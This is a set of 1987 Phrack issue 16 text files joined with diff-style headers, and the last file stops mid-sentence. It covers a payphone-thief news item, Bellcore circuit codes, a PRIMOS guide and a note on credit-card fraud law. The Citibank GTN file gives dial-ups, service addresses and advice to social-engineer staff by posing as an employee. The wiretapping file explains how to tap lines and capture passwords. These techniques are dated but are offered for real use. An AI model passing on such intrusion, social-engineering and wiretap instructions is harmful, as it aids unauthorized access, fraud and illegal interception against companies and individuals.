#### PHRACK PRESENTS ISSUE 16 ####
^*^*^*^Phrack World News, Part 5^*^*^*^
**** File 12 of 12 ****
"Phone Companies Across U.S. Want Coins Box Thief's Number"
From the Tribune - Thursday, Nov. 5, 1987
SAN FRANCISCO - Seven telephone companies across the country, including
Pacific Bell, are so frazzled by a coin box thief that they are offering a
reward of $25,000 to catch him.
He's very clever, telephone officials say, and is the only known suspect in
the country that is able to pick the locks on coin boxes in telephone
booths with relative ease.
He is believed responsible for stealing hundreds of thousands of dollars from
coin boxes in the Bay Area and Sacramento this year.
The suspect has been identified by authorities as James Clark, 47, of
Pennisula, Ohio, a machinist and tool-and-die maker, who is believed
responsible for coin box thefts in 24 other states.
Other companies sharing in the reward are Ohio Bell, Southern Bell, South
Carolina Bell, South Central Bell, Southwestern Bell, Bell Telephone of
Pennsylvania and U.S. West.
Clark allegedly hit pay phones that are near freeways and other major
thoroughfares. Clark, described as 5 feet 9 inches tall, with shoulder
length brown hair and gold-rimmed glasses, is reported to be driving a new
Chevrolet Astro van painted a dark metallic blue.
He was recently in Arizona but is believed to be back in California.
Written by a Tribune Staff Writer
Typed by the $muggler

313
phrack16/2.txt Normal file
View file

@ -0,0 +1,313 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 2 of 12 =====
--------------------------------------------------------------------
BELLCORE Information by The Mad Phone-man
--------------------------------------------------------------------
So, you've broken into the big phone box on the wall, and are looking at a
bunch of tags with numbers and letters on them. Which one is the modem line?
Which one is the 1-800 WATS line? Which one is the Alarm line? Bell has a
specific set of codes that enable you to identify what you're looking at.
These are the same codes the installer gets from the wire center to enable him
to set up the line, test it, and make sure it matches the customers order.
Here are some extracts from the Bellcore book.
First lets take a hypothetical line number I'm familiar with:
64FDDV 123456
-------------------------------------------------------------
The serial number format:
Prefix + service code + modifier + serial number +
digits: 1,2 3,4 5,6 7,8,9,10,11,12 continued
-------------------------------------------------------------------------
Suffix + CO assigning circuit number + segment
digits: 13,14,15 16,17,18,19 20,21,22
-------------------------------------------------------------------------
The important shit is in the 3rd thru 6th digit.
SERVICE CODES Intra or Inter LATA Block 1-26
-------------
AA- Packet analog access line
AB- Packet switch trunk
AD- Attendant
AF- Commercial audio fulltime
AI- Automatic identified outward dialing
AL- Alternate services
AM- Packet, off-network access line
AN- Announcement service
AO- International/Overseas audio (full time)
AP- Commercial audio (part time)
AT- International/Overseas audio (part time)
AU- Autoscript
BA- Protective alarm (CD)
BL- Bell & lights
BS- Siren control
CA- SSN Access
CB- OCC Audio facilities
CC- OCC Digital facility-medium speed
CE- SSN Station line
CF- OCC Special facility
CG- OCC Telegraph facility
CH- OCC Digital facility high-speed
CI- Concentrator Identifier trunk
CJ- OCC Control facility
CK- OCC Overseas connecting facility wide-band
CL- Centrex CO line
CM- OCC Video facility
CN- SSN Network trunk
CO- OCC Overseas connecting facility
CP- Concentrator identifier signaling link
CR- OCC Backup facility
CS- Channel service
CT- SSN Tie trunk
CV- OCC Voice grade facility
CW- OCC Wire pair facility
CZ- OCC Access facility
DA- Digital data off-net extension
DB- HSSDS 1.5 mb/s access line
DF- HSSDS 1.5 mb/s hub to hub
DG- HSSDS 1.5 mb/s hub to earth station
DH- Digital service
DI- Direct-in dial
DJ- Digit trunk
DK- Data link
DL- Dictation line
DO- Direct-out dial
DP- Digital data-2 4 kb/s
DQ- Digital data-4 8 kb/s
DR- Digital data-9.6 kb/s
DW- Digital data-56 kb/s
DY- Digital service (under 1 mb/s)
EA- Switched access
EB- ENFIA II end office trunk
EC- ENFIA II tandem trunk
EE- Combined access
EF- Entrance facility-voice grade
EG- Type #2 Telegraph
EL- Emergency reporting line
EM- Emergency reporting center trunk
EN- Exchange network access facility
EP- Entrance facility-program grade
EQ- Equipment only-(network only) assignment
ES- Extension service-voice grade
ET- Entrance facility-telegraph grade
EU- Extension service-telegraph grade
EV- Enhanced Emergency reporting trunk
EW- Off network MTS/WATS equivalent service
FD- Private line-data
FG- Group-supergroup spectrum
FR- Fire dispatch
FT- Foreign exchange trunk
FW- Wideband channel
FV- Voice grade facility
FX- Foreign exchange
HP- Non-DDS Digital data 2.4 kb/s
HQ- Non-DDS Digital data 4.8 kb/s
HR- Non-DDS Digital data 9.6 kb/s
HW- Non-DDS Digital data 56 kb/s
IT- Intertandem tie trunk
LA- Local area data channel
LL- Long distance terminal line
LS- Local service
LT- Long distance terminal trunk
MA- Cellular access trunk 2-way
MT- Wired music
NA- CSACC link (EPSCS)
NC- CNCC link (EPSCS)
ND- Network data line
OI- Off premises intercommunication station line
ON- Off network access line
OP- Off premises extension
OS- Off premises PBX station line
PA- Protective alarm (AC)
PC- Switched digital-access line
PG- Paging
PL- Private line-voice
PM- Protective monitoring
PR- Protective relaying-voice grade
PS- MSC constructed spare facility
PV- Protective relaying-telegraph grade
PW- Protective relaying-signal grade
PX- PBX station line
PZ- MSC constructed circuit
QU- Packet asynchronous access line
QS- Packet synchronous access line
RA- Remote attendant
RT- Radio landline
SA- Satellite trunk
SG- Control/Remote metering signal grade
SL- Secretarial line
SM- Sampling
SN- Special access termination
SQ- Equipment only-customer premises
SS- Dataphone select-a-station
TA- Tandem tie-trunk
TC- Control/Remote metering-telegraph grade
TF- Telephoto/Facsimile
TK- Local PBX trunk
TL- Non-tandem tie trunk
TR- Turret or automatic call distributor (ACD) trunk
TT- Teletypewriter channel
TU- Turret or automatic call distributor (ACD) line
TX- Dedicated facility
VF- Commercial television (full time)
VH- Commercial television (part time)
VM- Control/Remote metering-voice grade
VO- International overseas television
VR- Non-commercial television (7003,7004)
WC- Special 800 surface trunk
WD- Special WATS trunk (OUT)
WI- 800 surface trunk
WO- WATS line (OUT)
WS- WATS trunk (OUT)
WX- 800 service line
WY- WATS trunk (2-way)
WZ- WATS line (2-way)
ZA- Alarm circuits
ZC- Call and talk circuits
ZE- Emergency patching circuits
ZF- Order circuits, facility
ZM- Measurement and recording circuits
ZP- Test circuit, plant service center
ZQ- Quality and management circuits
ZS- Switching, control and transfer circuits
ZT- Test circuits, central office
ZV- Order circuits, service
SERVICE CODES FOR LATA ACCESS
---------------------------------------------------
HC- High capacity 1.544 mb/ps
HD- High capacity 3.152 mb/ps
HE- High capacity 6.312 mb/ps
HF- High capacity 6.312
HG- High capacity 274.176 mb/s
HS- High capacity subrate
LB- Voice-non switched line
LC- Voice-switched line
LD- Voice-switched trunk
LE- Voice and tone-radio landline
LF- Data low-speed
LG- Basic data
LH- Voice and data-PSN access trunk
LJ- Voice and data SSN access
LK- Voice and data-SSN-intermachine trunk
LN- Data extension, voice grade data facility
LP- Telephoto/Facsimile
LQ- Voice grade customized
LR- Protection relay-voice grade
LZ- Dedicated facility
MQ- Metallic customized
NQ- Telegraph customized
NT- Protection alarm-metallic
NU- Protection alarm
NV- Protective relaying/Telegraph grade
NW- Telegraph grade facility-75 baud
NY- Telegraph grade facility- 150 baud
PE- Program audio, 200-3500 hz
PF- Program audio, 100-5000 hz
PJ- Program audio, 50-8000 hz
PK- Program audio, 50-15000 hz
PQ- Program grade customized
SB- Switched access-standard
SD- Switched access-improved
SE- Special access WATS-access-std
SF- Special access WATS access line improved
SJ- Limited switched access line
TQ- Television grade customized
TV- TV Channel one way 15khz audio
TW- TV Channel one way 5khz audio
WB- Wideband digital, 19.2 kb/s
WE- Wideband digital, 50 kb/s
WF- Wideband digital, 230.4 kb/s
WH- Wideband digital, 56 kb/s
WJ- Wideband analog, 60-108 khz
WL- Wideband analog 312-552 khz
WN- Wideband analog 10hz-20 khz
WP- Wideband analog, 29-44 khz
WR- Wideband analog 564-3064 khz
XA- Dedicated digital, 2.4 kb/s
XB- Dedicated digital, 4.8 kb/s
XG- Dedicated digital, 9.6 kb/s
XH- Dedicated digital 56. kb/s
Now the last two positions of real importance, 5 & 6 translate thusly:
Modifier Character Position 5
------------------------------
INTRASTATE INTERSTATE
-------------------------------------
A B Alternate data & non data
-------------------------------------
C Customer controlled service
-------------------------------------
D E Data
-------------------------------------
N L Non-data operation
-------------------------------------
P Only offered under intra restructured
private line (RPL) tariff
-------------------------------------
S T Simultaneous data & non-data
-------------------------------------
F Interexchange carriers is less than 50%
-------------------------------------
G Interstate carrier is more than 50%
usage
==============================================================================
MODIFIER CHARACTER POSITION 6
--------------------------------------------------------------
TYPE OF SERVICE Intra LATA
--------------------------------------
ALL EXCEPT US GOVT US GOVERNMENT
--------------------------------------
T M Circuit is BOC customer to BOC customer
all facilities are TELCO provided
--------------------------------------
C P Circuit is BOC/BOC and part of
facilities or equipment is telco
provided
--------------------------------------
A J Circuit is BOC/BOC all electrically
connected equip is customer provided
--------------------------------------
L F Circuit terminates at interexchange
carrier customers location
--------------------------------------
Z Official company service
--------------------------------------
Interlata
S S Circuit terminates at interexchange
carriers point of term (POT)
--------------------------------------
V V Circuit terminates at an interface of a
radio common carrier (RCC)
--------------------------------------
Z Official company service
--------------------------------------
Corridor
Y X Corridor circuit
--------------------------------------
International
K H Circuit has at least 2 terminations in
different countries
--------------------------------------
Interexchange carrier
Y X Transport circuit between interexchange
carrier terminals.
----------------------------------------
So 64FDDV would be a private line data circuit terminating at a radiocommon
carrier. Other examples can be decoded likewise.
Enjoy this information as much as I've had finding it.
-= The Mad Phone-man =-

289
phrack16/3.txt Normal file
View file

@ -0,0 +1,289 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 3 of 12 =====
==========================================
==== Cosmos Kid Presents... ====
==== A Hacker's Guide To: PRIMOS ====
==== Part I ====
==== (c) 1987 by Cosmos Kid ====
==========================================
Author's Note:
--------------
This file is the first of two files dealing with PRIMOS and its operations.
The next file will be in circulation soon so be sure to check it out at any
good BBS.
Preface:
--------
This file is written in a form to teach beginners as well as experienced
Primos users about the system. It is written primarily for beginners however.
PRIMOS, contrary to popular belief can be a very powerful system if used
correctly. I have outlined some VERY BASIC commands and their use in this
file along with some extra commands, not so BASIC.
Logging On To A PRIMOS:
-----------------------
A PRIMOS system is best recognized by its unusual prompts. These are: 'OK',
and 'ER!'. Once connected, these are not the prompts you get. The System
should identify itself with a login such as:
Primenet V2.3
-or-
Primecom Network
The system then expects some input from you,preferably: LOGIN. You will
then be asked to enter your user identification and password as a security
measure. The login onto a PRIMOS is as follows:
CONNECT
Primenet V 2.3 (system)
LOGIN<CR> (you)
User id? (system)
AA1234 (you)
Password? (system)
KILLME (you)
OK, (system)
Preceding the OK, will be the systems opening message. Note that if you fail
to type login once connected, most other commands are ignored and the system
responds with:
Please Login
ER!
Logging Off Of A PRIMOS:
------------------------
If at any time you get bored with Primos, just type 'LOGOFF' to leave the
system. Some systems have a TIMEOUT feature implemented meaning that if you
fail to type anything for the specified amount of time the system will
automatically log you out, telling you something like:
Maximum Inactive Time Limit Exceeded
System Prompts:
---------------
As stated previously, the prompts 'ER!' and 'OK,' are used on Primos. The
'OK,' denotes that last command was executed properly and it is now waiting
for your next command. The 'ER!' prompt denotes that you made an error in
typing your last command. This prompt is usually preceded by an error
message.
Special Characters:
-------------------
Some terminals have certain characteristics that are built in to the terminal.
key
CONTROL-H
Deletes the last character typed.
Other Special Characters:
-------------------------
RETURN: The return key signals PRIMOS that you have completed typing a
command and that you are ready for PRIMOS to process the command.
BREAK/CONTROL-P: Stops whatever is currently being processed in memory and
will return PRIMOS to your control. To restart a process,
type:
START (abbreviated with S).
CONTROL-S: Stops the scrolling of the output on your terminal for viewing.
CONTROL-Q: Resumes the output scrolling on your terminal for inspection.
SEMICOLON ';': The logical end of line character. The semicolon is used to
enter more than one command on one line.
Getting Help:
-------------
You can get on-line information about the available PRIMOS commands by using
the 'HELP' command. The HELP system is keyword driven. That is, all
information is stored under keywords that indicate the content of the help
files. This is similar to VAX. Entering the single command 'HELP' will enter
the HELP sub-system and will display an informative page of text. The next
page displayed will provide you with a list of topics and their keywords.
These topics include such items as PRIME, RAP, MAIL, and DOC. If you entered
the MAIL keyword, you would be given information concerning the mail sub-
system available to users on P simply enter PRIME to obtain information on all
PRIMOS commands. You could then enter COPY to obtain information on that
specific topic.
Files And Directories:
----------------------
The name of a file or sub-directory may have up to 32 characters. The
filename may contain any of the following characters, with the only
restriction being that the first character of the filename may not be a digit.
Please note that BLANK spaces are NOT allowed ANYWHERE:
A-Z .....alphabet
0-9 .....numeric digits
& .....ampersand
# .....pound sign
$ .....dollar sign
- .....dash/minus sign
* .....asterisk/star
. .....period/dot
/ .....slash/divide sign
Naming Conventions:
-------------------
There are very few restrictions on the name that you may give a file.
However, you should note that many of the compilers (language processors) and
commands on the PRIME will make certain assumptions if you follow certain
guidelines. File name suffixes help to identify the file contents with regard
to the language the source code was written in and the contents of the file.
For instance, if you wrote a PL/1 program and named the file containing the
source code 'PROG1.PL1' (SEGmented loader) would take the binary file, link
all the binary libraries that you specify and produce a file named
'PROG1.SEG', which would contain the binary code necessary to execute the
program. Some common filename suffixes are: F77, PAS, COBOL, PL1G, BASIC,
FTN, CC, SPIT (source files). These all denote separate languages and get
into more advanced programming on PRIMOS. (e.g. FTN=Fortran).
BIN=the binary code produced by the compiler
LIST=the program listing produced by the compiler
SEG=the linked binary code produced by SEG
Some files which do not use standard suffixes may instead use the filename
prefixes to identify the contents of the file. Some common filename prefixes
are:
B Binary code produced by the compiler
L source program Listing
C Command files
$ Temporary work files (e.g. T$0000)
# Seg files
Commands For File Handling:
----------------------------
PRIMOS has several commands to control and access files and file contents.
These commands can be used to list the contents of files and directories, and
to copy, add, delete, edit, and print the contents of files. The capitalized
letters of each are deleted. A LIST must be enclosed in parenthesis.
Close arg ....Closes the file specified by 'arg'. 'Arg' could also be
a list of PRIMOS file unit numbers, or the word 'ALL' which
closes all open files and units.
LIMITS ....Displays information about the login account, including
information about resources allocated and used, grantor, and
expiration date.
Edit Access ....Edits the Access rights for the named directories and
files.
CName arg1 arg2 ....Changes the Name of 'arg1' to 'arg2'. The arguments can
be files or directories.
LD ....The List Directory command has several arguments that
allow for controlled listing format and selection of entries.
Attach arg ....allows you to Attach to the directory 'arg' with the
access rights specified in the directory Access Control List.
DOWN <arg> ....allows you to go 'DOWN into' a sub-ufd (directory). You
can specify which one of several sub-ufds to descend into
with the optional 'arg'.
UP <arg> ....allows you to go 'UP into' a higher ufd (directory). You
can specify which one of several to climb into with the
optional 'arg'.
WHERE ....Displays what the current directory attach point is and
your access rights.
CREATE arg ....CREATES a new sub-directory as specified by 'arg'.
COPY arg1 arg2 ....COPIES the file or directory specified by 'arg1' into a
file by the same name specified by 'arg2'. Both 'arg1' and
'arg2' can be filename with the SPOOL command, whose format
is:
SPOOL filename -AT destination
where filename is the name of the file you want printed, and
destination is the name of the printer where you want the
file printed. For example if you want the file 'HACK.FTN'
printed at the destination 'LIB' type:
SPOOL HACK.FTN -AT LIB
PRIMOS then gives you some information telling you that the file named was
SPOOLed and the length of the file in PRIMOS records. To see the entries in
the SPOOL queue, type:
SPOOL -LIST
PRIMOS then lists out all the files waiting to be printed on the printers on
your login system. Also included in this information will be the filename of
the files waiting to print, the login account name of the user who SPOOLed the
file, the time that the file was SPOOLed, the size of the file in PRIMOS
records, and the printer name where the file is to print.
Changing The Password Of An Account:
------------------------------------
If you wish to change the password to your newly acquired account you must use
the 'CPW' command (Change PassWord). To do this enter the current password on
the command line followed by RETURN. PRIMOS will then prompt you for your
desired NEW password and then ask you to confirm your NEW password. To change
your password of 'JOE' to 'SCHMOE' then type:
OK, (system)
CPW JOE (you)
New Password? (system)
You can save a copy of your terminal session by using the COMO (COMmand
Output) command. When you type:
COMO filename
Everything which is typed or displayed on your terminal is saved (recorded)
into the filename on the command line (filename). If a file by the same name
exists, then that file will be REPLACED with NO WARNING GIVEN! When you have
finished doing whatever it was you wanted a hardcopy of, you type:
COMO -End
which will stop recording your session and will close the COMO file. You can
now print the COMO file using the SPOOL command as stated earlier.
Conclusion:
-----------
This concludes this first file on PRIMOS. Please remember this file is
written primarily for beginners, and some of the text may have seemed BORING!
However, this filewaswrittenin a verbose fashion to FULLYINTRODUCEPRIMOS
to beginners. Part II will deal with more the several languages on PRIMOS and
some other commands.
Author's Endnote:
-----------------
I would like to thank the following people for the help in writing this file:
AMADEUS (an oldie who is LONG GONE!)
The University Of Kentucky
State University Of New York (SUNY) Primenet
And countless others.....
Questions, threats, or suggestions to direct towards me, I can be found on any
of the following:
The Freeworld ][.........301-668-7657
Digital Logic............305-395-6906
The Executive Inn........915-581-5146
OSUNY BBS................914-725-4060
-=*< Cosmos Kid >*=-
========================================

248
phrack16/4.txt Normal file
View file

@ -0,0 +1,248 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 4 of 12 =====
Hacking the Global Telecommunications Network
Researched and written by: The Kurgan
Compiled on 10/5/87
Network Procedure Differences
The Global Telecommunications Network (GTN) is Citibanks's international data
network, which allows Citicorp customers and personnel to access Citibank's
worldwide computerized services.
Two different sign on procedures exist: Type A and Type B. All users, except
some in the U.S., must use Type B. (U.S. users: the number you dial into
and the Welcome Banner you receive determine what sign-on procedure to
follow.) Welcome banners are as follows:
TYPE A:
WELCOME TO CITIBANK. PLEASE SIGN ON.
XXXXXXXX
@
PASSWORD =
@
TYPE B:
PLEASE ENTER YOUR ID:-1->
PLEASE ENTER YOUR PASSWORD:-2->
CITICORP (CITY NAME). KEY GHELP FOR HELP.
XXX.XXX
PLEASE SELECT SERVICE REQUIRED.-3->
Type A User Commands
User commands are either instructions or information you send to the network
for it to follow. The commands available are listed below.
User Action: Purpose:
@ (CR) To put you in command mode (mode in which you can put
your currently active service on hold and ask the network
for information, or log-off the service). (NOTE: This
symbol also serves as the network prompt; see Type A
messages.)
BYE (CR) To leave service from command mode.
Continue (CR) To return to application from command mode (off hold)
D (CR) To leave service from command mode.
ID To be recognized as a user by the network (beginning of
sign on procedure), type ID, then a space and your
assigned network ID. (Usually 5 or 6 characters long)
Status (CR) To see a listing of network address (only from @
prompt). You need this address when "reporting a
problem."
Type A messages
The network displays a variety of messages on your screen which either require
a user command or provide you with information.
Screen shows: Explanation:
@ Network prompt -- request for Network ID.
BAD PASSWORD Network does not except your password.
<address> BUSY The address is busy, try back later.
WELCOME TO CITIBANK. Network welcome banner. Second line provides address
PLEASE SIGN ON. # to be used when reporting "problems."
XXX.XXX
<address> ILLEGAL You typed in an address that doesn't exist.
<address> CONNECTED Your connection has been established.
DISCONNECTED Your connect has been disconnected.
NOT CONNECTED You're not connected to any service at the time.
NUI REQUIRED Enter your network user ID.
PASSWORD = Request for your assigned password.
STILL CONNECTED You are still connected to the service you were using.
? Network doesn't understand your entry.
Type B User Commands and Messages
Since the Type B procedure is used with GTN dial-ups, it requires fewer
commands to control the network. There is only 1 Type B command. Break plus
(CR) allows you to retain connection to one service, and connect with another.
Screen Shows: Explanation:
CITICORP (CITY NAME). Network Welcome banner. Type in service address.
PLEASE SELECT SERVICE
COM Connection made.
DER The port is closed out of order, or no open routes are
available.
DISCONNECTED You have disconnected from the service and the network.
ERR Error in service selected.
INV Error in system.
MOM Wait, the connection is being made.
NA Not authorized for this service.
NC Circuits busy, try again.
NP Check service address.
OCC Service busy, try again.
Sign-on Procedures:
There are two types of sign on procedures. Type A and Type B.
Type A:
To log onto a system with type A logon procedure, the easiest way is through
Telenet. Dial your local Telenet port. When you receive the "@" prompt, type
in the Type-A service address (found later in the article) then follow the
instructions from there on.
Type-B:
Dial the your GTN telephone #, then hit return twice. You will then see:
"PLEASE ENTER YOUR ID:-1->"
Type in a network ID number and hit return.
You will then see
"PLEASE ENTER YOUR PASSWORD:-2->"
Type in Network Password and hit return.
Finally you will see the "CITICORP (city name)" welcome banner, and it
will ask you to select the service you wish to log onto. Type the address and
hit return. (A list of addresses will be provided later)
Trouble Shooting:
If you should run into any problems, the Citicorp personnel will gladly
help their "employees" with any questions. Just pretend you work for Citibank
and they will give you a lot. This has been tried and tested. Many times,
when you attempt to log on to a system and you make a mistake with the
password, the system will give you a number to call for help. Call it and
tell them that you forgot your pass or something. It usually works, since
they don't expect people to be lying to them. If you have any questions about
the network itself, call 305-975-5223. It is the Technical Operations Center
(TOC) in Pompano, Florida.
Dial-Ups:
The following list of dial-ups is for North America. I have a list of
others, but I don't think that they would be required by anyone. Remember:
Dial-ups require Type-B log-on procedure. Type-A is available on systems
accessible through Telenet.
Canada Toronto 416-947-2992 (1200 Baud V.22 Modem Standard)
U.S.A. Los Angeles 213-629-4025 (300/1200 Baud U.S.A. Modem Standard)
Jersey City 201-798-8500
New York City 212-269-1274
212-809-1164
Service Addresses:
The following is a VERY short list of just some of the 100's of service
addresses. In a later issue I will publish a complete list.
Application Name: Type-A Type-B
CITIADVICE 2240001600 CADV
CITIBANKING ATHENS 2240004000 :30
CITIBANKING PARIS 2240003300 :33
CITIBANKING TOKYO 2240008100 :81
CITICASH MANAGER
INTERNATIONAL 1 (NAFG CORP) 2240001200 CCM1
INTERNATIONAL 7 (DFI/WELLS FARGO) 2240013700 CCM7
COMPMARK ON-LINE 2240002000 CS4
ECONOMIC WEEK ON-LINE 2240011100 FAME1
INFOPOOL/INFOTEXT 2240003800 IP
EXAMPLE OF LOGON PROCEDURE:
THE FOLLOWING IS THE BUFFERED TEXT OF A LOG-ON TO CITIBANKING PARIS THROUGH
TELENET.
CONNECT 1200
TELENET
216 13.41
TERMINAL=VT100
@2240003300
223 90331E CONNECTED
ENTER TYPE NUMBER OR RETURN
TYPE B IS BEEHIVE DM20
TYPE 1 IS DEC VT100
TYPE A IS DEC VT100 ADV VIDEO
TYPE 5 IS DEC VT52
TYPE C IS CIFER 2684
TYPE 3 IS LSI ADM 3A
TYPE L IS LSI ADM 31
TYPE I IS IBM 3101
TYPE H IS HP 2621
TYPE P IS PERKIN ELMER 1200
TYPE K IS PRINTER KEYBOARD
TYPE M IS MAI BASIC 4
TYPE T IS TELEVIDEO 9XX
TYPE V IS VOLKER CRAIG 4404
TYPE S IS SORD MICRO WITH CBMP
RELEASE BSC9.5 - 06JUN85
FOR 300 BAUD KEY ! AND CARRIAGE RETURN
CONFIG. K1.1-I11H-R-C-B128
ENTER TYPE NUMBER OR RETURN K
CONNECTED TO CITIBANK PARIS - CBP1 ,PORT 5
Have fun with this info, and remember, technology will rule in the end.

142
phrack16/5.txt Normal file
View file

@ -0,0 +1,142 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 5 of 12 =====
----------------------------------------------------------------------------
| The Laws Governing Credit Card Fraud |
| |
| Written by Tom Brokaw |
| September 19, 1987 |
| |
| Written exclusively for: |
| Phrack Magazine |
| |
----------------------------------------------------------------------------
(A Tom Brokaw/Disk Jockey Law File Production)
Introduction:
------------
In this article, I will try to explain the laws concerning the illegal
use of credit cards. Explained will be the Michigan legislative view on the
misuse and definition of credit cards.
Definition:
----------
Well, Michigan Law section 157, defines a credit card as "Any instrument
or device which is sold, issued or otherwise distributed by a business
organization identified thereon for obtaining goods, property, services or
anything of value." A credit card holder is defined as: 1) "The person or
organization who requests a credit card and to whom or for whose benefit a
credit card is subsequently issued" or 2) "The person or organization to whom
a credit card was issued and who uses a credit card whether the issuance of
the credit card was requested or not." In other words, if the company or
individual is issued a card, once using it, they automatically agree to all
the laws and conditions that bind it.
Stealing, Removing, Retaining or Concealment:
--------------------------------------------
Michigan Law states, that it is illegal to "steal, knowingly take or
remove a credit card from a card holder." It also states that it is wrongful
to "conceal a credit card without the consent of the card holder." Notice
that it doesn't say anything about carbons or numbers acquired from BBSes,
but I think that it could be considered part of the laws governing the access
of a persons account without the knowledge of the cardholder, as described
above.
Possession with Intent to Circulate or Sell
-------------------------------------------
The law states that it is illegal to possess or have under one's control,
or receive a credit card if his intent is to circulate or sell the card. It
is also illegal to deliver, circulate or sell a credit card, knowing that such
a possession, control or receipt without the cardholders consent, shall be
guilty of a FELONY. Notice again, they say nothing about possession of
carbons or numbers directly. It also does not clearly state what circulation
or possession is, so we can only stipulate. All it says is that possession of
a card (material plastic) is illegal.
Fraud, forgery, material alteration, counterfeiting.
----------------------------------------------------
However, it might not be clearly illegal to possess a carbon or CC
number. It IS illegal to defraud a credit card holder. Michigan law states
that any person who, with intent to defraud, forge, materially alter or
counterfeit a credit card, shall be guilty of a felony.
Revoked or cancelled card, use with intent to defraud.
------------------------------------------------------
This states that "Any person who knowingly and with intent to defraud for
the purpose of obtaining goods, property or services or anything of value on a
credit card which has been revoked or cancelled or reported stolen by the
issuer or issuee, has been notified of the cancellation by registered or
certified mail or by another personal service shall be fined not more than
$1,000 and not imprisoned not more than a year, or both. However, it does not
clearly say if it is a felony or misdemeanor or civil infraction. My guess is
that it would be dependant on the amount and means that you used and received
when you defraud the company. Usually, if it is under $100, it is a
misdemeanor but if it is over $100, it is a felony. I guess they figure that
you should know these things.
The People of The State of Michigan vs. Anderson (possession)
------------------------------------------------
On April 4, 1980, H. Anderson attempted to purchase a pair of pants at
Danny's Fashion Shops, in the Detroit area. He went up to the cashier to pay
for the pants and the cashier asked him if he had permission to use the credit
card. He said "No, I won it last night in a card game". The guy said that I
could purchase $50 dollars worth of goods to pay back the debt. At the same
time, he presumed the card to be a valid one and not stolen. Well, as it
turned out it was stolen but he had no knowledge of this. Later, he went to
court and pleased guilty of attempted possession of a credit card of another
with intent or circulate or sell the same. At the guilty hearings, Mr.
Anderson stated that the credit card that he attempted to use had been
acquired by him in payment of a gambling debt and assumed that the person was
the owner. The trial court accepted his plea of guilty. At the sentencing,
Mr. Anderson, denied that he had any criminal intent. Anderson appealed the
decision stating that the court had erred by accepting his plea of guilty on
the basis of insufficient factual data. Therefore, the trial court should not
have convicted him of attempted possession and reversed the charges.
The People of the State of Michigan vs. Willie Dockery
------------------------------------------------------
On June 23, 1977, Willie Dockery attempted to purchase gas at a Sears gas
station by using a stolen credit card. The attendant noticed that his
driver's license picture was pasted on and notified the police. Dockery
stated that he had found the credit card and the license at an intersection,
in the city of Flint. He admitted that he knowingly used the credit card and
driver's license without the consent of the owner but he said that he only had
purchased gasoline on the card. It turns out that the credit card and
driver's license was stolen from a man, whose grocery store had been robbed.
Dockery said that he had no knowledge of the robbery and previous charges on
the cardwhich totalled$1,373.21. He admitted that he did paste his picture
on the driver's license. Butagain the court screws up, they receive evidence
that the defendant had a record of felonies dating back to when he was sixteen
and then assumed that he was guilty on the basis of his prior offenses. The
judge later said that the present sentence could not stand in this court so
the case was referred to another court.
Conclusion
----------
I hope that I have given you a better understanding about the law, that
considers the illegal aspects of using credit cards. All this information was
taken from The Michigan Compiled Laws Annotated Volume 754.157a-s and from The
Michigan Appeals Report.
In my next file I will talk about the laws concerning Check Fraud.
-Tom Brokaw

197
phrack16/6.txt Normal file
View file

@ -0,0 +1,197 @@
===== Phrack Magazine presents Phrack 16 =====
===== File 6 of 12 =====
******************************************************************************
* *
* Tapping Telephone Lines *
* *
* Voice or Data *
* *
* For Phun, Money, and Passwords *
* *
* Or How to Go to Jail for a Long Time. *
* *
******************************************************************************
Written by Agent Steal 08/87
Included in this file is...
* Equipment needed
* Where to buy it
* How to connect it
* How to read recorded data
But wait!! There's more!!
* How I found a Tymnet node
* How I got in
*************
THE EQUIPMENT
*************
First thing you need is an audio tape recorder. What you will be
recording, whether it be voice or data, will be in an analog audio format.
>From now on, most references will be towards data recording. Most standard
cassette recorders will work just fine. However, you are limited to 1 hour
recording time per side. This can present a problem in some situations. A
reel to reel can also be used. The limitations here are size and availability
of A.C. Also, some reel to reels lack a remote jack that will be used to
start and stop the recorder while the line is being used. This may not
present a problem. More later. The two types of recorders I would advise
staying away from (for data) are the micro cassette recorders and the standard
cassette recorders that have been modified for 8 to 10 hour record time. The
speed of these units is too unstable. The next item you need, oddly enough,
is sold by Radio Shack under the name "Telephone recording control" part
# 43-236 $24.95. See page 153 of the 1987 Radio Shack catalog.
*****************
HOW TO CONNECT IT
*****************
The Telephone recording control (TRC) has 3 wires coming out of it.
#1 Telco wire with modular jack. Cut this and replace with alligator clips.
#2 Audio wire with miniature phone jack (not telephone). This plugs
into the microphone level input jack of the tape recorder.
#3 Audio wire with sub miniature phone jack. This plugs into the "REM"
or remote control jack of the tape recorder.
Now all you need to do is find the telephone line, connect the alligator
clips, turn the recorder on, and come back later. Whenever the line goes off
hook, the recorder starts. It's that simple.
****************
READING THE DATA
****************
This is the tricky part. Different modems and different software respond
differently but there are basics. The modem should be connected as usual to
the telco line and computer. Now connect the speaker output of the tape
player directly to the telephone line. Pick up the phone and dial the high
side of a loop so your line doesn't make a lot of noise and garble up your
data. Now, command your modem into the answer mode and press play. The tape
should be lined up at the beginning of the recorded phone call, naturally, so
you can see the login. Only one side of the transmission between the host and
terminal can be monitored at a time. Going to the originate mode you will see
what the host transmitted. This will include the echoes of the terminal. Of
course the password will be echoed as ####### for example, but going to the
answer mode will display exactly what the terminal typed. You'll understand
when you see it. A couple of problems you might run into will be hum and
garbage characters on the screen. Try connecting the speaker output to the
microphone of the hand set in your phone. Use a 1 to 1 coupling transformer
between the tape player input and the TRC audio output. These problems are
usually caused when using A.C. powered equipment. The common ground of this
equipment interferes with the telco ground which is D.C. based.
I was a little reluctant to write this file because I have been
unsuccessful in reading any of the 1200 baud data I have recorded. I have
spoke with engineers and techs. Even one of the engineers who designs modems.
All of them agree that it IS possible, but can't tell me why I am unable to do
this. I believe that the problems is in my cheap ass modem. One tech told me
I needed a modem with phase equalization circuitry which is found in most
expensive 2400 baud modems. Well one of these days I'll find $500 lying on
the street and I'll have nothing better to spend it on! Ha! Actually, I have
a plan and that's another file.....
I should point out one way of reading 1200 baud data. This should work in
theory, however, I have not attempted it.
Any fully Hayes compatible modem has a command that shuts off the carrier
and allows you to monitor the phone line. The command is ATS10. You would
then type either answer or originate depending on who you wanted to monitor.
It would be possible to write a program that records the first 300 or so
characters then writes it to disk, thus allowing unattended operation.
**************
HOW CRAZY I AM
**************
PASSWORDS GALORE!!!!
After numerous calls to several Bell offices, I found the one that handled
